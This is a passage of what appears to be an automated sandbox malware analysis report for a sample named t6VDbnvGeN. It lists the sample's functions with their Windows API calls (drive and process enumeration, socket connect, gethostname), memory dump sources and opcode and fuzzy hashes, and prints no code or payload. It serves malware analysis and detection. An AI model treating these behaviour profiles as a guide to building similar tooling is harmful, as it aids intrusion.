                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 8914e49cf7813450f25f78e7a13311ad41a0965381bcea47ac839039fa2d8264
                                                              • Instruction ID: 978dd16a339402a3baba4d011401db654088a63feba68fa09babc86f2f68e61d
                                                              • Opcode Fuzzy Hash: 8914e49cf7813450f25f78e7a13311ad41a0965381bcea47ac839039fa2d8264
                                                              • Instruction Fuzzy Hash: 572105FB2482157FA60391815B58DFA7B6EFAC3731730887AF40BD7582D2950A4A6231
                                                              Function 07560286 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07560397
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 82a7ccb475ff55993a874cd196775ae0509902bb12ebe9b4447947ea69caaa80
                                                              • Instruction ID: f62928deb89337747689eac688341fe6c9ce3c0cae1d11fce797ce1a0da7d60c
                                                              • Opcode Fuzzy Hash: 82a7ccb475ff55993a874cd196775ae0509902bb12ebe9b4447947ea69caaa80
                                                              • Instruction Fuzzy Hash: 8511C2EB2481197E760291811B5CEFB6B6DFAC3732B308876F40FE7282D2D40A4D6136
                                                              Function 07560292 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: a5a199a52b1b58ab5dceca4f264067034f30b8c817508aff3c23cef8935560a6
                                                              • Instruction ID: a9657e6fb5be4d40649b78b8576ef586de37edb57d055f5a7cb857786b125d48
                                                              • Opcode Fuzzy Hash: a5a199a52b1b58ab5dceca4f264067034f30b8c817508aff3c23cef8935560a6
                                                              • Instruction Fuzzy Hash: F811E5EB2581157E760291811B58EFA6B6DFAD3331B30C876F40BD7282D2D40A4D2236
                                                              Function 007C78B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID: FD %s:%d sclose(%d)
                                                              • API String ID: 2781271927-3116021458
                                                              • Opcode ID: 11d258bbc32c30311344a5ad1fba07d3e8e0751644ebc7da8ae3948dc063dd23
                                                              • Instruction ID: a94d7012962d91f00aeaa4b41ac102a86b9c4a31e4b9d191f646453e75454431
                                                              • Opcode Fuzzy Hash: 11d258bbc32c30311344a5ad1fba07d3e8e0751644ebc7da8ae3948dc063dd23
                                                              • Instruction Fuzzy Hash: C2D05E22A0A221AB8530A598AC48D5BABA8AEC6F30B09085CF94477205D6249C01C7F3
                                                              Function 0088B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0088B29E,?,00000000,?,?), ref: 0088B0B9
                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00873C41,00000000), ref: 0088B0C1
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastconnect
                                                              • String ID:
                                                              • API String ID: 374722065-0
                                                              • Opcode ID: ab078747ee7c15bf387a88aa313ae2bf2ee44337e63001fe9e1d04a388897185
                                                              • Instruction ID: ac7f65d52bde1feca512ef5a9aad7de4b8f292d031f4a3baf46bfdd5768e3212
                                                              • Opcode Fuzzy Hash: ab078747ee7c15bf387a88aa313ae2bf2ee44337e63001fe9e1d04a388897185
                                                              • Instruction Fuzzy Hash: EE01D8322046045BCA206A68CC44F6BB799FFC9364F140B24F978E32E1D726DD509752
                                                              Function 075A0381 Relevance: 1.7, APIs: 1, Instructions: 220COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,11CE97F1,11CE97F1,?), ref: 075A04FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441374301.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75a0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 807c31f93ced3ed141d8321c5a0d884a915beed200b5c188d71b6feffef2fd4c
                                                              • Instruction ID: 36e1aa25a251472de952499409b95a2990d4694057de26c2b382949a722d2203
                                                              • Opcode Fuzzy Hash: 807c31f93ced3ed141d8321c5a0d884a915beed200b5c188d71b6feffef2fd4c
                                                              • Instruction Fuzzy Hash: 6641B1E76BD1617D724290556F649FE2B5EF5CB730B30883AF80BD7582F2890E8A5132
                                                              Function 075A03B2 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,11CE97F1,11CE97F1,?), ref: 075A04FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441374301.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75a0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 97ccc4c205bccc91c09aceebef9851557a457c3c2e11831c49e4ea52df7aeac3
                                                              • Instruction ID: bee61b77c665d75f658aaff71287070c02caf6dbafb888ade11ad00d2de40cb6
                                                              • Opcode Fuzzy Hash: 97ccc4c205bccc91c09aceebef9851557a457c3c2e11831c49e4ea52df7aeac3
                                                              • Instruction Fuzzy Hash: 30317FEB6BD165BD714290456F649FE675EF5CB730B30883AB80BD7582F2840E895132
                                                              Function 075A0463 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,11CE97F1,11CE97F1,?), ref: 075A04FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441374301.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75a0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: e522316d358546a726c54df55fefdd4c2eabd4c7adf6ed6c096c7db2c2882056
                                                              • Instruction ID: ac6042858ca876fb6d6971d50546307bcb8a5b9cd09955676c4cd8f0d1a295b1
                                                              • Opcode Fuzzy Hash: e522316d358546a726c54df55fefdd4c2eabd4c7adf6ed6c096c7db2c2882056
                                                              • Instruction Fuzzy Hash: 0141D1EBA7C155BDB24284516A64AFE2B6DF5C7730B30883AF80BD75C2F2880E595171
                                                              Function 00874950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • gethostname.WS2_32(00000000,00000040), ref: 00874AA5
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: gethostname
                                                              • String ID:
                                                              • API String ID: 144339138-0
                                                              • Opcode ID: 8ee2c2d4df8d17631a77eb4bc2090eb290dbcfe41ab0c6e40f8fbbe89a5a2453
                                                              • Instruction ID: e2a186327fd7ce90abc2d139fa48c96f0ac3e35231153c1f013f90daeee4278b
                                                              • Opcode Fuzzy Hash: 8ee2c2d4df8d17631a77eb4bc2090eb290dbcfe41ab0c6e40f8fbbe89a5a2453
                                                              • Instruction Fuzzy Hash: B551C1706043009BE7309B65DD897277AE4FF05329F14A83DEA8EC66A9E775EC84C742
                                                              Function 075A0407 Relevance: 1.7, APIs: 1, Instructions: 167COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,11CE97F1,11CE97F1,?), ref: 075A04FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441374301.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75a0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 598ef01487e3c0dc4877884ba429805e6e6f0486b17d4cbae3c20fb323283368
                                                              • Instruction ID: 4a8596170278d635f0acf81faf134f1f82b72c3bf26b4a26d4619924260004dc
                                                              • Opcode Fuzzy Hash: 598ef01487e3c0dc4877884ba429805e6e6f0486b17d4cbae3c20fb323283368
                                                              • Instruction Fuzzy Hash: 1C31AFE767D151BDB24291516F64AFE2B5DF5CB730B30883AB80BD75C2F2880E895172
                                                              Function 075A03F9 Relevance: 1.7, APIs: 1, Instructions: 165COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,11CE97F1,11CE97F1,?), ref: 075A04FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441374301.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75a0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 532e4c52e9baff3c7ed52daf233139af7e570b9437360384a8e7eabfb6d2ac50
                                                              • Instruction ID: 4463855c58a76b85ffec34c7e8f83c9319f0221ab234b13cd9d239e4c9441c33
                                                              • Opcode Fuzzy Hash: 532e4c52e9baff3c7ed52daf233139af7e570b9437360384a8e7eabfb6d2ac50
                                                              • Instruction Fuzzy Hash: E7317EEB67D165BD724290416B64AFE275DF5CB730B30883AB80BD7582F2880E995132
                                                              Function 075A0446 Relevance: 1.7, APIs: 1, Instructions: 156COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,11CE97F1,11CE97F1,?), ref: 075A04FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441374301.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75a0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: d992e95eb50c1d4e7688015e7052e5fde7fa5b882b09846fc9e725529f4acbcd
                                                              • Instruction ID: 814cd914160b3ef4ba10b2f083e69068c873ff55a818c432a572f935648fcdf5
                                                              • Opcode Fuzzy Hash: d992e95eb50c1d4e7688015e7052e5fde7fa5b882b09846fc9e725529f4acbcd
                                                              • Instruction Fuzzy Hash: 41319CEB27D161BD714290412B64AFE676EF4CB730B30C836F80BDB582F2880E895176
                                                              Function 075A0435 Relevance: 1.7, APIs: 1, Instructions: 152COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,11CE97F1,11CE97F1,?), ref: 075A04FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441374301.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75a0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 5afd444b1a35f9b3404fabaef2c992771f2a7341d431af8469ae5af3ef846f25
                                                              • Instruction ID: 9a23c6fb171d1bd4999af2c21e065f45d2bd53a58f072301602bcd55161d4b77
                                                              • Opcode Fuzzy Hash: 5afd444b1a35f9b3404fabaef2c992771f2a7341d431af8469ae5af3ef846f25
                                                              • Instruction Fuzzy Hash: 13216DE767D165BD714290416B549FE671EF4CB730B30C83AB80BD7581F2880E995076
                                                              Function 075A0495 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,11CE97F1,11CE97F1,?), ref: 075A04FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441374301.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75a0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 31e6cecfa23e2dd9105a5a2dcceeee7aa63672be8d4abd8fa6fd6c9185b1841c
                                                              • Instruction ID: ed5741769df41138f76af7b0a0f6a0dc76c98412c076f2fec173591457eea699
                                                              • Opcode Fuzzy Hash: 31e6cecfa23e2dd9105a5a2dcceeee7aa63672be8d4abd8fa6fd6c9185b1841c
                                                              • Instruction Fuzzy Hash: A72177EB279155BD714290916B24AFE2B6EE4CB730B30C836F80BD7582F2880E895136
                                                              Function 075A04DC Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,11CE97F1,11CE97F1,?), ref: 075A04FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441374301.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75a0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 22e6cd6295d8df352142af1f2103cbb3a0821f6b56a5d91937a7de2049b15205
                                                              • Instruction ID: f8721e49c322bab4bf2b94bcf93162de468869301bcbbce301561dffbd082e43
                                                              • Opcode Fuzzy Hash: 22e6cd6295d8df352142af1f2103cbb3a0821f6b56a5d91937a7de2049b15205
                                                              • Instruction Fuzzy Hash: 64218EE7279151BD720290556B64AFF676EF5CB730B30C83AF80AD7582F2840E8A5076
                                                              Function 075A04B6 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,11CE97F1,11CE97F1,?), ref: 075A04FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441374301.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75a0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 6dd02078157621a0e41146d3f75e0334a0157325664ea4409129922830c6ffa2
                                                              • Instruction ID: b28860751c103b2c74216549e70bdd0f568e9fac0ac7498f3f80638c0c8706f1
                                                              • Opcode Fuzzy Hash: 6dd02078157621a0e41146d3f75e0334a0157325664ea4409129922830c6ffa2
                                                              • Instruction Fuzzy Hash: E0218EEB27D151BD714290916B64AFF676EF4DB730B34C836F80BDA582F2880E895136
                                                              Function 075A04C9 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,11CE97F1,11CE97F1,?), ref: 075A04FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441374301.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75a0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 900c45d6601081f21b8e04bddd10a8f50b56588b1aa489e0a6c1a568fca6708e
                                                              • Instruction ID: 584b4e95cb4bf4c70a4422927189bfbce76a56fd2719a1cd7842cb8efc18c423
                                                              • Opcode Fuzzy Hash: 900c45d6601081f21b8e04bddd10a8f50b56588b1aa489e0a6c1a568fca6708e
                                                              • Instruction Fuzzy Hash: 8F218EEB27D1517D714290816B24EFF676EE4CB730B30C836F80BD6582F2880E895176
                                                              Function 075B0343 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 387195a5e58d016680446583f496094ed8ffc55aa7f3698ea59b79c269bd724d
                                                              • Instruction ID: a2de40d904ffb944b7a7c606762a1c28765514dfdfe31a286a0b8c3b922a892c
                                                              • Opcode Fuzzy Hash: 387195a5e58d016680446583f496094ed8ffc55aa7f3698ea59b79c269bd724d
                                                              • Instruction Fuzzy Hash: 8D118FEB29C2257E712381A12F58DFB9B2EF4C36307348936F80BD2682E2C44E4E1131
                                                              Function 0756031E Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07560397
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: a62b11c9e8bd8b52b2a975bc2c2e24f0640076dfb9c558129322e7ac7bf87007
                                                              • Instruction ID: 51d7f1ccc16acce8226a762fa160d7da688e61fc8e72a30114feaf293d18656d
                                                              • Opcode Fuzzy Hash: a62b11c9e8bd8b52b2a975bc2c2e24f0640076dfb9c558129322e7ac7bf87007
                                                              • Instruction Fuzzy Hash: EB114CEB3592197FE50261802B5CBF67B2DFAD7632B308873F80AD7182D2C5060E5271
                                                              Function 075B0368 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32NextW.KERNEL32(?,?,?,?), ref: 075B0396
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441447511.00000000075B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_75b0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: de39adf521a92a92fcf7ef206c18e700816713021ada842a81ac3c9c4ca8d29e
                                                              • Instruction ID: 137102ad183c5cb12ef8a179718f40a4a6470a07cacd1a63740dd459418b7cf5
                                                              • Opcode Fuzzy Hash: de39adf521a92a92fcf7ef206c18e700816713021ada842a81ac3c9c4ca8d29e
                                                              • Instruction Fuzzy Hash: 271104E759C2667E222382A11B48DFB9B1FF4C3630B348936F80BD76C2E2C44A0E0031
                                                              Function 075602BE Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441223045.0000000007560000.00000040.00001000.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7560000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: e2248b900f24b74bb2075efe550237faa36993fa9c9e0595ee523f8524422e36
                                                              • Instruction ID: 81b5f1c0fd4bc0f5a9ac9ef3d3ae9f26b4d7e297f5bfa6d3a9126770f466d057
                                                              • Opcode Fuzzy Hash: e2248b900f24b74bb2075efe550237faa36993fa9c9e0595ee523f8524422e36
                                                              • Instruction Fuzzy Hash: 2001D8EB3592197F65029185275CEF66B2DFAD7232B308877F80BD7182D2850A095136
                                                              Function 0088AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 0088AFD1
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID:
                                                              • API String ID: 3358416759-0
